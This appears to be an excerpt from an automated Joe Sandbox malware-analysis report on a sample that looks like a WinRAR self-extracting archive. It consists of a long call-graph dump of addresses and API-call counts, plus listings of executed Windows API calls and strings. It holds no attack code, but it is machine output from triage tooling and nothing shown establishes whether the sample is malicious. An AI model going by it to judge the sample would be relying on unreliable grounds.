90898b 25303 902021 74 API calls 25027->25303 25028 908992 25029 908a5f 25028->25029 25034 9089e1 25028->25034 25033 908ab6 25029->25033 25046 908a6a 25029->25046 25032->25014 25032->25025 25032->25027 25032->25028 25301 908117 84 API calls 25032->25301 25302 902021 74 API calls 25032->25302 25041 908a4c 25033->25041 25306 907fc0 97 API calls 25033->25306 25038 90a231 3 API calls 25034->25038 25034->25041 25043 908b14 25034->25043 25035 909105 25040 90959a 80 API calls 25035->25040 25036 908ab4 25037 90959a 80 API calls 25036->25037 25037->25014 25042 908a19 25038->25042 25040->25014 25041->25036 25041->25043 25042->25041 25304 9092a3 97 API calls 25042->25304 25043->25035 25055 908b82 25043->25055 25307 9098bc 25043->25307 25044 90ab1a 8 API calls 25047 908bd1 25044->25047 25046->25036 25305 907db2 101 API calls 25046->25305 25050 90ab1a 8 API calls 25047->25050 25067 908be7 25050->25067 25053 908b70 25311 906e98 77 API calls 25053->25311 25055->25044 25056 908cbc 25057 908e40 25056->25057 25058 908d18 25056->25058 25061 908e52 25057->25061 25062 908e66 25057->25062 25081 908d49 25057->25081 25059 908d8a 25058->25059 25060 908d28 25058->25060 25069 908167 19 API calls 25059->25069 25065 908d6e 25060->25065 25072 908d37 25060->25072 25063 909215 123 API calls 25061->25063 25064 913377 75 API calls 25062->25064 25063->25081 25066 908e7f 25064->25066 25065->25081 25314 9077b8 111 API calls 25065->25314 25317 913020 123 API calls 25066->25317 25067->25056 25068 908c93 25067->25068 25075 90981a 79 API calls 25067->25075 25068->25056 25312 909a3c 82 API calls 25068->25312 25073 908dbd 25069->25073 25313 902021 74 API calls 25072->25313 25077 908df5 25073->25077 25078 908de6 25073->25078 25073->25081 25075->25068 25316 909155 93 API calls __EH_prolog 25077->25316 25315 907542 85 API calls 25078->25315 25084 908f85 25081->25084 25318 902021 74 API calls 25081->25318 25083 909090 25083->25035 25085 90a4ed 3 API calls 25083->25085 25084->25035 25084->25083 25086 90903e 25084->25086 25292 909f09 SetEndOfFile 25084->25292 25087 9090eb 25085->25087 25293 909da2 25086->25293 25087->25035 25319 902021 74 API calls 25087->25319 25090 909085 25092 909620 77 API calls 25090->25092 25092->25083 25093 9090fb 25320 906dcb 76 API calls 25093->25320 25096 9016a4 25095->25096 25336 90cee1 25096->25336 25100 909f59 25099->25100 25101 909f63 25100->25101 25344 906d0c 78 API calls 25100->25344 25101->24931 25103->24944 25109 901732 25104->25109 25106 9013d6 25106->24982 25107->24971 25108->24978 25110 901748 25109->25110 25121 9017a0 __InternalCxxFrameHandler 25109->25121 25111 901771 25110->25111 25122 906c36 76 API calls __vswprintf_c_l 25110->25122 25113 9017c7 25111->25113 25114 90178d ___std_exception_copy 25111->25114 25116 923e3e 22 API calls 25113->25116 25114->25121 25124 906ca7 75 API calls 25114->25124 25115 901767 25123 906ca7 75 API calls 25115->25123 25118 9017ce 25116->25118 25118->25121 25125 906ca7 75 API calls 25118->25125 25121->25106 25122->25115 25123->25111 25124->25121 25125->25121 25127 90cf4d 25126->25127 25129 90cf54 25126->25129 25128 90981a 79 API calls 25127->25128 25128->25129 25129->24985 25130->24987 25132 91de78 25131->25132 25133 90e617 53 API calls 25132->25133 25134 91de9b 25133->25134 25135 904092 _swprintf 51 API calls 25134->25135 25136 91dead 25135->25136 25137 91d4d4 16 API calls 25136->25137 25138 911b7c 25137->25138 25138->24940 25140 9019bf 25139->25140 25143 9019bb 25139->25143 25144 909e80 79 API calls 25140->25144 25141 9019d4 25145 9018f6 25141->25145 25143->24994 25144->25141 25146 901908 25145->25146 25147 901945 25145->25147 25148 903b2d 101 API calls 25146->25148 25153 903fa3 25147->25153 25151 901928 25148->25151 25151->25143 25157 903fac 25153->25157 25154 903b2d 101 API calls 25154->25157 25155 901966 25155->25151 25158 901e50 25155->25158 25157->25154 25157->25155 25170 910e08 25157->25170 25159 901e5a __EH_prolog 25158->25159 25178 903bba 25159->25178 25161 901e84 25162 901732 78 API calls 25161->25162 25165 901f0b 25161->25165 25163 901e9b 25162->25163 25206 9018a9 78 API calls 25163->25206 25165->25151 25166 901eb3 25168 901ebf _wcslen 25166->25168 25207 911b84 MultiByteToWideChar 25166->25207 25208 9018a9 78 API calls 25168->25208 25171 910e0f 25170->25171 25172 910e2a 25171->25172 25176 906c31 RaiseException CallUnexpected 25171->25176 25174 910e3b SetThreadExecutionState 25172->25174 25177 906c31 RaiseException CallUnexpected 25172->25177 25174->25157 25176->25172 25177->25174 25179 903bc4 __EH_prolog 25178->25179 25180 903bf6 25179->25180 25181 903bda 25179->25181 25183 903e51 25180->25183 25186 903c22 25180->25186 25234 90138b 74 API calls 25181->25234 25251 90138b 74 API calls 25183->25251 25185 903be5 25185->25161 25186->25185 25209 913377 25186->25209 25188 903ca3 25190 903d2e 25188->25190 25199 903c9a 25188->25199 25237 90d051 25188->25237 25189 903c9f 25189->25188 25236 9020bd 78 API calls 25189->25236 25219 90ab1a 25190->25219 25192 903c71 25192->25188 25192->25189 25193 903c8f 25192->25193 25235 90138b 74 API calls 25193->25235 25194 903d41 25200 903dd7 25194->25200 25201 903dc7 25194->25201 25245 912297 25199->25245 25243 913020 123 API calls 25200->25243 25223 909215 25201->25223 25204 903dd5 25204->25199 25244 902021 74 API calls 25204->25244 25206->25166 25207->25168 25208->25165 25210 91338c 25209->25210 25212 913396 ___std_exception_copy 25209->25212 25252 906ca7 75 API calls 25210->25252 25213 9134c6 25212->25213 25214 91341c 25212->25214 25218 913440 _abort 25212->25218 25254 92238d RaiseException 25213->25254 25253 9132aa 75 API calls 3 library calls 25214->25253 25217 9134f2 25218->25192 25220 90ab28 25219->25220 25222 90ab32 25219->25222 25221 91eb38 8 API calls 25220->25221 25221->25222 25222->25194 25224 90921f __EH_prolog 25223->25224 25255 907c64 25224->25255 25227 9013ba 78 API calls 25228 909231 25227->25228 25258 90d114 25228->25258 25230 90928a 25230->25204 25232 90d114 118 API calls 25233 909243 25232->25233 25233->25230 25233->25232 25267 90d300 97 API calls __InternalCxxFrameHandler 25233->25267 25234->25185 25235->25199 25236->25188 25238 90d072 25237->25238 25239 90d084 25237->25239 25268 90603a 82 API calls 25238->25268 25269 90603a 82 API calls 25239->25269 25242 90d07c 25242->25190 25243->25204 25244->25199 25247 9122a1 25245->25247 25246 9122ba 25270 910eed 86 API calls 25246->25270 25247->25246 25250 9122ce 25247->25250 25249 9122c1 25249->25250 25251->25185 25252->25212 25253->25218 25254->25217 25256 90b146 GetVersionExW 25255->25256 25257 907c69 25256->25257 25257->25227 25265 90d12a __InternalCxxFrameHandler 25258->25265 25259 90d29a 25260 90d2ce 25259->25260 25261 90d0cb 6 API calls 25259->25261 25262 910e08 SetThreadExecutionState RaiseException 25260->25262 25261->25260 25263 90d291 25262->25263 25263->25233 25264 918c8d 103 API calls 25264->25265 25265->25259 25265->25263 25265->25264 25266 90ac05 91 API calls 25265->25266 25266->25265 25267->25233 25268->25242 25269->25242 25270->25249 25271->25004 25272->25004 25273->25002 25275 905d2a 25274->25275 25321 905c4b 25275->25321 25277 905d5d 25279 905d95 25277->25279 25326 90b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25277->25326 25279->25019 25281 908186 25280->25281 25282 908232 25281->25282 25333 90be5e 19 API calls __InternalCxxFrameHandler 25281->25333 25332 911fac CharUpperW 25282->25332 25285 90823b 25285->25022 25287 907c22 25286->25287 25288 907c5a 25287->25288 25334 906e7a 74 API calls 25287->25334 25288->25032 25290 907c52 25335 90138b 74 API calls 25290->25335 25292->25086 25294 909db3 25293->25294 25297 909dc2 25293->25297 25295 909db9 FlushFileBuffers 25294->25295 25294->25297 25295->25297 25296 909e3f SetFileTime 25296->25090 25297->25296 25298->25011 25299->25014 25300->25014 25301->25032 25302->25032 25303->25028 25304->25041 25305->25036 25306->25041 25308 908b5a 25307->25308 25309 9098c5 GetFileType 25307->25309 25308->25055 25310 902021 74 API calls 25308->25310 25309->25308 25310->25053 25311->25055 25312->25056 25313->25081 25314->25081 25315->25081 25316->25081 25317->25081 25318->25084 25319->25093 25320->25035 25327 905b48 25321->25327 25324 905b48 2 API calls 25325 905c6c 25324->25325 25325->25277 25326->25277 25328 905b52 25327->25328 25330 905c3a 25328->25330 25331 90b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25328->25331 25330->25324 25330->25325 25331->25328 25332->25285 25333->25282 25334->25290 25335->25288 25337 90cef2 25336->25337 25342 90a99e 86 API calls 25337->25342 25339 90cf24 25343 90a99e 86 API calls 25339->25343 25341 90cf2f 25342->25339 25343->25341 25344->25101 25346 90a6a8 25345->25346 25347 90a6c1 FindFirstFileW 25346->25347 25348 90a727 FindNextFileW 25346->25348 25350 90a6d0 25347->25350 25355 90a709 25347->25355 25349 90a732 GetLastError 25348->25349 25348->25355 25349->25355 25351 90bb03 GetCurrentDirectoryW 25350->25351 25352 90a6e0 25351->25352 25353 90a6e4 FindFirstFileW 25352->25353 25354 90a6fe GetLastError 25352->25354 25353->25354 25353->25355 25354->25355 25355->24953 25356->24790 25357->24793 25358->24793 25359->24796 25360->24803 25362 909f42 78 API calls 25361->25362 25363 901fe8 25362->25363 25364 901a04 101 API calls 25363->25364 25367 902005 25363->25367 25365 901ff5 25364->25365 25365->25367 25368 90138b 74 API calls 25365->25368 25367->24812 25367->24813 25368->25367 25369 9013e1 84 API calls 2 library calls 25396 9194e0 GetClientRect 25429 9121e0 26 API calls std::bad_exception::bad_exception 25449 91f2e0 46 API calls __RTC_Initialize 25450 92bee0 GetCommandLineA GetCommandLineW 25371 91eae7 25372 91eaf1 25371->25372 25373 91e85d ___delayLoadHelper2@8 14 API calls 25372->25373 25374 91eafe 25373->25374 25397 91f4e7 29 API calls _abort 25430 90f1e8 FreeLibrary 25470 901710 86 API calls 25431 91ad10 73 API calls 25400 91a400 GdipDisposeImage GdipFree 25451 91d600 70 API calls 25401 926000 QueryPerformanceFrequency QueryPerformanceCounter 25434 922900 6 API calls 4 library calls 25452 92f200 51 API calls 25472 92a700 21 API calls 25437 91f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25473 91ff30 LocalFree 23507 92bb30 23508 92bb42 23507->23508 23509 92bb39 23507->23509 23511 92ba27 23509->23511 23531 9297e5 GetLastError 23511->23531 23513 92ba34 23551 92bb4e 23513->23551 23515 92ba3c 23560 92b7bb 23515->23560 23518 92ba53 23518->23508 23524 92ba91 23584 9291a8 20 API calls _abort 23524->23584 23526 92ba96 23585 928dcc 23526->23585 23527 92baae 23528 92bada 23527->23528 23529 928dcc _free 20 API calls 23527->23529 23528->23526 23591 92b691 26 API calls 23528->23591 23529->23528 23532 9297fb 23531->23532 23536 929801 23531->23536 23592 92ae5b 11 API calls 2 library calls 23532->23592 23537 929850 SetLastError 23536->23537 23593 92b136 23536->23593 23537->23513 23538 92981b 23540 928dcc _free 20 API calls 23538->23540 23542 929821 23540->23542 23541 929830 23541->23538 23543 929837 23541->23543 23544 92985c SetLastError 23542->23544 23601 929649 20 API calls _abort 23543->23601 23602 928d24 38 API calls _abort 23544->23602 23547 929842 23549 928dcc _free 20 API calls 23547->23549 23550 929849 23549->23550 23550->23537 23550->23544 23552 92bb5a ___scrt_is_nonwritable_in_current_image 23551->23552 23553 9297e5 _abort 38 API calls 23552->23553 23555 92bb64 23553->23555 23557 92bbe8 _abort 23555->23557 23559 928dcc _free 20 API calls 23555->23559 23605 928d24 38 API calls _abort 23555->23605 23606 92ac31 EnterCriticalSection 23555->23606 23607 92bbdf LeaveCriticalSection _abort 23555->23607 23557->23515 23559->23555 23608 924636 23560->23608 23563 92b7ee 23565 92b805 23563->23565 23566 92b7f3 GetACP 23563->23566 23564 92b7dc GetOEMCP 23564->23565 23565->23518 23567 928e06 23565->23567 23566->23565 23568 928e44 23567->23568 23572 928e14 _abort 23567->23572 23619 9291a8 20 API calls _abort 23568->23619 23570 928e2f RtlAllocateHeap 23571 928e42 23570->23571 23570->23572 23571->23526 23574 92bbf0 23571->23574 23572->23568 23572->23570 23618 927a5e 7 API calls 2 library calls 23572->23618 23575 92b7bb 40 API calls 23574->23575 23576 92bc0f 23575->23576 23579 92bc60 IsValidCodePage 23576->23579 23581 92bc16 23576->23581 23583 92bc85 _abort 23576->23583 23578 92ba89 23578->23524 23578->23527 23580 92bc72 GetCPInfo 23579->23580 23579->23581 23580->23581 23580->23583 23630 91fbbc 23581->23630 23620 92b893 GetCPInfo 23583->23620 23584->23526 23586 928dd7 RtlFreeHeap 23585->23586 23587 928e00 __dosmaperr 23585->23587 23586->23587 23588 928dec 23586->23588 23587->23518 23711 9291a8 20 API calls _abort 23588->23711 23590 928df2 GetLastError 23590->23587 23591->23526 23592->23536 23599 92b143 _abort 23593->23599 23594 92b183 23604 9291a8 20 API calls _abort 23594->23604 23595 92b16e RtlAllocateHeap 23597 929813 23595->23597 23595->23599 23597->23538 23600 92aeb1 11 API calls 2 library calls 23597->23600 23599->23594 23599->23595 23603 927a5e 7 API calls 2 library calls 23599->23603 23600->23541 23601->23547 23603->23599 23604->23597 23606->23555 23607->23555 23609 924653 23608->23609 23615 924649 23608->23615 23610 9297e5 _abort 38 API calls 23609->23610 23609->23615 23611 924674 23610->23611 23616 92993a 38 API calls __cftof 23611->23616 23613 92468d 23617 929967 38 API calls __cftof 23613->23617 23615->23563 23615->23564 23616->23613 23617->23615 23618->23572 23619->23571 23621 92b977 23620->23621 23627 92b8cd 23620->23627 23624 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23621->23624 23626 92ba23 23624->23626 23626->23581 23637 92c988 23627->23637 23629 92ab78 __vsnwprintf_l 43 API calls 23629->23621 23631 91fbc5 IsProcessorFeaturePresent 23630->23631 23632 91fbc4 23630->23632 23634 91fc07 23631->23634 23632->23578 23710 91fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23634->23710 23636 91fcea 23636->23578 23638 924636 __cftof 38 API calls 23637->23638 23640 92c9a8 MultiByteToWideChar 23638->23640 23641 92c9e6 23640->23641 23642 92ca7e 23640->23642 23644 928e06 __vsnwprintf_l 21 API calls 23641->23644 23647 92ca07 _abort __vsnwprintf_l 23641->23647 23643 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23642->23643 23645 92b92e 23643->23645 23644->23647 23651 92ab78 23645->23651 23646 92ca78 23656 92abc3 20 API calls _free 23646->23656 23647->23646 23649 92ca4c MultiByteToWideChar 23647->23649 23649->23646 23650 92ca68 GetStringTypeW 23649->23650 23650->23646 23652 924636 __cftof 38 API calls 23651->23652 23653 92ab8b 23652->23653 23657 92a95b 23653->23657 23656->23642 23658 92a976 __vsnwprintf_l 23657->23658 23659 92a99c MultiByteToWideChar 23658->23659 23660 92a9c6 23659->23660 23671 92ab50 23659->23671 23664 928e06 __vsnwprintf_l 21 API calls 23660->23664 23667 92a9e7 __vsnwprintf_l 23660->23667 23661 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23662 92ab63 23661->23662 23662->23629 23663 92aa30 MultiByteToWideChar 23665 92aa49 23663->23665 23666 92aa9c 23663->23666 23664->23667 23684 92af6c 23665->23684 23693 92abc3 20 API calls _free 23666->23693 23667->23663 23667->23666 23671->23661 23672 92aa73 23672->23666 23676 92af6c __vsnwprintf_l 11 API calls 23672->23676 23673 92aaab 23674 928e06 __vsnwprintf_l 21 API calls 23673->23674 23678 92aacc __vsnwprintf_l 23673->23678 23674->23678 23675 92ab41 23692 92abc3 20 API calls _free 23675->23692 23676->23666 23678->23675 23679 92af6c __vsnwprintf_l 11 API calls 23678->23679 23680 92ab20 23679->23680 23680->23675 23681 92ab2f WideCharToMultiByte 23680->23681 23681->23675 23682 92ab6f 23681->23682 23694 92abc3 20 API calls _free 23682->23694 23695 92ac98 23684->23695 23688 92afdc LCMapStringW 23689 92af9c 23688->23689 23690 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23689->23690 23691 92aa60 23690->23691 23691->23666 23691->23672 23691->23673 23692->23666 23693->23671 23694->23666 23696 92acc8 23695->23696 23700 92acc4 23695->23700 23696->23689 23702 92aff4 10 API calls 3 library calls 23696->23702 23697 92ace8 23697->23696 23699 92acf4 GetProcAddress 23697->23699 23701 92ad04 _abort 23699->23701 23700->23696 23700->23697 23703 92ad34 23700->23703 23701->23696 23702->23688 23704 92ad55 LoadLibraryExW 23703->23704 23709 92ad4a 23703->23709 23705 92ad72 GetLastError 23704->23705 23706 92ad8a 23704->23706 23705->23706 23707 92ad7d LoadLibraryExW 23705->23707 23708 92ada1 FreeLibrary 23706->23708 23706->23709 23707->23706 23708->23709 23709->23700 23710->23636 23711->23590 25404 92c030 GetProcessHeap 25438 92b4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25453 91c220 93 API calls _swprintf 25406 92f421 21 API calls __vsnwprintf_l 25407 901025 29 API calls 24346 92c051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25409 91e455 14 API calls ___delayLoadHelper2@8 24380 91cd58 24381 91ce22 24380->24381 24387 91cd7b 24380->24387 24396 91c793 _wcslen _wcsrchr 24381->24396 24408 91d78f 24381->24408 24384 91d40a 24386 911fbb CompareStringW 24386->24387 24387->24381 24387->24386 24388 91ca67 SetWindowTextW 24388->24396 24393 91c855 SetFileAttributesW 24394 91c90f GetFileAttributesW 24393->24394 24406 91c86f _abort _wcslen 24393->24406 24394->24396 24398 91c921 DeleteFileW 24394->24398 24396->24384 24396->24388 24396->24393 24399 91cc31 GetDlgItem SetWindowTextW SendMessageW 24396->24399 24402 91cc71 SendMessageW 24396->24402 24407 911fbb CompareStringW 24396->24407 24432 91b314 24396->24432 24436 91a64d GetCurrentDirectoryW 24396->24436 24438 90a5d1 6 API calls 24396->24438 24439 90a55a FindClose 24396->24439 24440 91b48e 76 API calls 2 library calls 24396->24440 24441 923e3e 24396->24441 24398->24396 24400 91c932 24398->24400 24399->24396 24401 904092 _swprintf 51 API calls 24400->24401 24403 91c952 GetFileAttributesW 24401->24403 24402->24396 24403->24400 24404 91c967 MoveFileW 24403->24404 24404->24396 24405 91c97f MoveFileExW 24404->24405 24405->24396 24406->24394 24406->24396 24437 90b991 51 API calls 2 library calls 24406->24437 24407->24396 24410 91d799 _abort _wcslen 24408->24410 24409 91d9e7 24409->24396 24410->24409 24411 91d8a5 24410->24411 24412 91d9c0 24410->24412 24457 911fbb CompareStringW 24410->24457 24454 90a231 24411->24454 24412->24409 24415 91d9de ShowWindow 24412->24415 24415->24409 24417 91d8d9 ShellExecuteExW 24417->24409 24424 91d8ec 24417->24424 24419 91d8d1 24419->24417 24420 91d925 24459 91dc3b 6 API calls 24420->24459 24421 91d97b CloseHandle 24422 91d989 24421->24422 24423 91d994 24421->24423 24460 911fbb CompareStringW 24422->24460 24423->24412 24424->24420 24424->24421 24426 91d91b ShowWindow 24424->24426 24426->24420 24428 91d93d 24428->24421 24429 91d950 GetExitCodeProcess 24428->24429 24429->24421 24430 91d963 24429->24430 24430->24421 24433 91b31e 24432->24433 24434 91b3f0 ExpandEnvironmentStringsW 24433->24434 24435 91b40d 24433->24435 24434->24435 24435->24396 24436->24396 24437->24406 24438->24396 24439->24396 24440->24396 24442 928e54 24441->24442 24443 928e61 24442->24443 24444 928e6c 24442->24444 24445 928e06 __vsnwprintf_l 21 API calls 24443->24445 24446 928e74 24444->24446 24452 928e7d _abort 24444->24452 24450 928e69 24445->24450 24447 928dcc _free 20 API calls 24446->24447 24447->24450 24448 928e82 24469 9291a8 20 API calls _abort 24448->24469 24449 928ea7 HeapReAlloc 24449->24450 24449->24452 24450->24396 24452->24448 24452->24449 24470 927a5e 7 API calls 2 library calls 24452->24470 24461 90a243 24454->24461 24457->24411 24458 90b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24458->24419 24459->24428 24460->24423 24462 91ec50 24461->24462 24463 90a250 GetFileAttributesW 24462->24463 24464 90a261 24463->24464 24465 90a23a 24463->24465 24466 90bb03 GetCurrentDirectoryW 24464->24466 24465->24417 24465->24458 24467 90a275 24466->24467 24467->24465 24468 90a279 GetFileAttributesW 24467->24468 24468->24465 24469->24450 24470->24452 25410 91a440 GdipCloneImage GdipAlloc 25455 923a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25476 931f40 CloseHandle 25412 91a070 10 API calls 25456 91b270 99 API calls 25479 901f72 128 API calls __EH_prolog 24520 909a74 24523 909a7e 24520->24523 24521 909b9d SetFilePointer 24522 909bb6 GetLastError 24521->24522 24525 909ab1 24521->24525 24522->24525 24523->24521 24523->24525 24526 909b79 24523->24526 24527 90981a 24523->24527 24526->24521 24528 909833 24527->24528 24530 909e80 79 API calls 24528->24530 24529 909865 24529->24526 24530->24529 25414 901075 84 API calls 24532 909f7a 24533 909f88 24532->24533 24534 909f8f 24532->24534 24535 909f9c GetStdHandle 24534->24535 24542 909fab 24534->24542 24535->24542 24536 90a003 WriteFile 24536->24542 24537 909fd4 WriteFile 24538 909fcf 24537->24538 24537->24542 24538->24537 24538->24542 24540 90a095 24544 906e98 77 API calls 24540->24544 24542->24533 24542->24536 24542->24537 24542->24538 24542->24540 24543 906baa 78 API calls 24542->24543 24543->24542 24544->24533 25457 928268 55 API calls _free 25416 91c793 107 API calls 4 library calls 25480 927f6e 52 API calls 3 library calls

                                                                                                  Executed Functions

                                                                                                  Function 0091DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 00910863: GetModuleHandleW.KERNEL32(kernel32), ref: 0091087C
                                                                                                    • Part of subcall function 00910863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0091088E
                                                                                                    • Part of subcall function 00910863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009108BF
                                                                                                    • Part of subcall function 0091A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0091A655
                                                                                                    • Part of subcall function 0091AC16: OleInitialize.OLE32(00000000), ref: 0091AC2F
                                                                                                    • Part of subcall function 0091AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0091AC66
                                                                                                    • Part of subcall function 0091AC16: SHGetMalloc.SHELL32(00948438), ref: 0091AC70
                                                                                                  • GetCommandLineW.KERNEL32 ref: 0091DF5C
                                                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0091DF83
                                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0091DF94
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0091DFCE
                                                                                                    • Part of subcall function 0091DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0091DBF4
                                                                                                    • Part of subcall function 0091DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0091DC30
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0091DFD7
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,0095EC90,00000800), ref: 0091DFF2
                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,0095EC90), ref: 0091DFFE
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0091E009
                                                                                                  • _swprintf.LIBCMT ref: 0091E048
                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0091E05A
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0091E061
                                                                                                  • LoadIconW.USER32(00000000,00000064), ref: 0091E078
                                                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0091E0C9
                                                                                                  • Sleep.KERNEL32(?), ref: 0091E0F7
                                                                                                  • DeleteObject.GDI32 ref: 0091E130
                                                                                                  • DeleteObject.GDI32(?), ref: 0091E140
                                                                                                  • CloseHandle.KERNEL32 ref: 0091E183
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                  • API String ID: 3049964643-3743209390
                                                                                                  • Opcode ID: 526211ed471f5bf31605e113f04231f87384cb1bf22713079d0d8d8a2b7ff238
                                                                                                  • Instruction ID: e6ab0039c85b250b5ad972d05a9fe06b63a2eb3388233741c70264b0f1ace5f5
                                                                                                  • Opcode Fuzzy Hash: 526211ed471f5bf31605e113f04231f87384cb1bf22713079d0d8d8a2b7ff238
                                                                                                  • Instruction Fuzzy Hash: 59613B7565C308BFD320ABB1EC49FAB77ECEB89705F000429F945921A1DB789E84DB61
                                                                                                  Function 0091A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 812 91a6c2-91a6df FindResourceW 813 91a6e5-91a6f6 SizeofResource 812->813 814 91a7db 812->814 813->814 816 91a6fc-91a70b LoadResource 813->816 815 91a7dd-91a7e1 814->815 816->814 817 91a711-91a71c LockResource 816->817 817->814 818 91a722-91a737 GlobalAlloc 817->818 819 91a7d3-91a7d9 818->819 820 91a73d-91a746 GlobalLock 818->820 819->815 821 91a7cc-91a7cd GlobalFree 820->821 822 91a74c-91a76a call 920320 CreateStreamOnHGlobal 820->822 821->819 825 91a7c5-91a7c6 GlobalUnlock 822->825 826 91a76c-91a78e call 91a626 822->826 825->821 826->825 831 91a790-91a798 826->831 832 91a7b3-91a7c1 831->832 833 91a79a-91a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 91a7b0 833->834 834->832
                                                                                                  APIs
                                                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0091B73D,00000066), ref: 0091A6D5
                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A6EC
                                                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A703
                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A712
                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0091B73D,00000066), ref: 0091A72D
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0091A73E
                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0091A762
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0091A7C6
                                                                                                    • Part of subcall function 0091A626: GdipAlloc.GDIPLUS(00000010), ref: 0091A62C
                                                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0091A7A7
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0091A7CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                  • String ID: PNG
                                                                                                  • API String ID: 211097158-364855578
                                                                                                  • Opcode ID: 5770f1457157d10a12dc93733834fc3935b4f4b5196ccbe622ee9600f3634056
                                                                                                  • Instruction ID: bc49977a7f7017fe45d7f0426ec18a418089679dc574705fc87201b6ded4674f
